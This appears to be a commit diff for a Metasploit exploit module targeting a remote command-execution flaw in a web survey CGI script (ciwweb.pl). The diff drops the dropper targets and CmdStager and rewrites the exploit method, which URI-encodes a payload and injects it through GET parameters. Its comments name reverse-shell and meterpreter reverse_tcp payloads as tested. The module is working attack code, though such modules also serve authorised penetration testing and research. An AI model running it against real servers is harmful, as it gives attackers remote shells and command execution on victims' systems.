@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
77 Rank = ExcellentRanking
88
99 include Msf ::Exploit ::Remote ::HttpClient
10- include Msf ::Exploit ::CmdStager
1110 prepend Msf ::Exploit ::Remote ::AutoCheck
1211
1312 def initialize ( info = { } )
@@ -26,7 +25,7 @@ def initialize(info = {})
2625 Successful exploitation may result in remote code execution under the privileges
2726 of the web server, potentially exposing sensitive data or disrupting survey operations.
2827
29- An attacker can execute arbitrary system commands as the web server.
28+ An attacker can execute arbitrary system commands in the context of the user running the web server.
3029 } ,
3130 'License' => MSF_LICENSE ,
3231 'Author' => [
@@ -41,45 +40,27 @@ def initialize(info = {})
4140 'Arch' => [ ARCH_CMD ] ,
4241 'Targets' => [
4342 [
44- 'Linux Dropper' ,
45- {
46- 'Platform' => [ 'linux' ] ,
47- 'Arch' => [ ARCH_X64 , ARCH_X86 , ARCH_ARMLE , ARCH_AARCH64 ] ,
48- 'Type' => :nix_dropper ,
49- 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
50- }
51- ] ,
52- [
53- 'Linux Command' ,
43+ 'Unix Command' ,
5444 {
5545 'Platform' => [ 'unix' , 'linux' ] ,
56- 'Arch' => [ ARCH_CMD ] ,
57- 'Type' => :nix_command ,
58- 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
59- }
60- ] ,
61- [
62- 'Windows Dropper' ,
63- {
64- 'Platform' => 'win' ,
65- 'Arch' => [ ARCH_X64 , ARCH_X86 , ARCH_ARMLE , ARCH_AARCH64 ] ,
66- 'Type' => :windows_dropper ,
67- 'DefaultOptions' => {
68- 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
69- }
46+ 'Arch' => ARCH_CMD ,
47+ 'Type' => :unix_cmd
48+ # Tested with cmd/unix/reverse_bash
49+ # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
7050 }
7151 ] ,
7252 [
7353 'Windows Command' ,
7454 {
75- 'Platform' => 'win' ,
76- 'Arch' => [ ARCH_CMD ] ,
77- 'Type' => :windows_command ,
55+ 'Platform' => [ 'windows' ] ,
56+ 'Arch' => ARCH_CMD ,
57+ 'Type' => :win_cmd ,
7858 'DefaultOptions' => {
79- 'PAYLOAD ' => 'cmd/windows/http/x64/meterpreter/reverse_tcp '
59+ 'FETCH_WRITABLE_DIR ' => 'C:\\\\Windows\\\\Tasks\\\\ '
8060 }
61+ # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
8162 }
82- ]
63+ ] ,
8364 ] ,
8465 'DefaultTarget' => 0 ,
8566 'DisclosureDate' => '2025-07-16' ,
@@ -95,7 +76,6 @@ def initialize(info = {})
9576 [
9677 OptString . new ( 'TARGETURI' , [ true , 'Path to vulnerable ciwweb.pl' , '/cgi-bin/ciwweb.pl' ] ) ,
9778 OptString . new ( 'STUDYNAME' , [ false , 'Value for the hid_studyname GET parameter' , '' ] ) ,
98- OptString . new ( 'WritableDir' , [ false , 'Writable directory for Windows Dropper' , 'C:\\Windows\\Tasks\\' ] )
9979 ]
10080 )
10181 end
@@ -133,8 +113,11 @@ def check
133113 CheckCode ::Safe
134114 end
135115
136- def execute_command ( cmd , _opts = { } )
137- cmd = Rex ::Text . uri_encode ( cmd ) . gsub ( '\\' , '%5C' ) . gsub ( '/' , '%2F' )
116+ def exploit
117+ print_status ( 'Uploading malicious payload...' )
118+
119+ cmd = Rex ::Text . uri_encode ( payload . encoded ) . gsub ( '\\' , '%5C' ) . gsub ( '/' , '%2F' )
120+ cmd = "cmd.exe%20/q%20/c%20\" #{ cmd } \" " if target [ 'Type' ] == :win_cmd
138121
139122 query = [
140123 'hid_javascript=1' ,
@@ -158,20 +141,4 @@ def execute_command(cmd, _opts = {})
158141 end
159142 end
160143 end
161-
162- def exploit
163- print_status ( 'Uploading malicious payload...' )
164-
165- case target [ 'Type' ]
166- when :windows_dropper
167- # This applies only to Windows
168- # The RCE doesn’t resolve environment variables like %TEMP%, so the path must be specified explicitly
169- # Files on the disk are also not deleted
170- execute_cmdstager ( temp : datastore [ 'WritableDir' ] )
171- when :nix_dropper
172- execute_cmdstager
173- when :windows_command , :nix_command
174- execute_command ( payload . encoded )
175- end
176- end
177144end
0 commit comments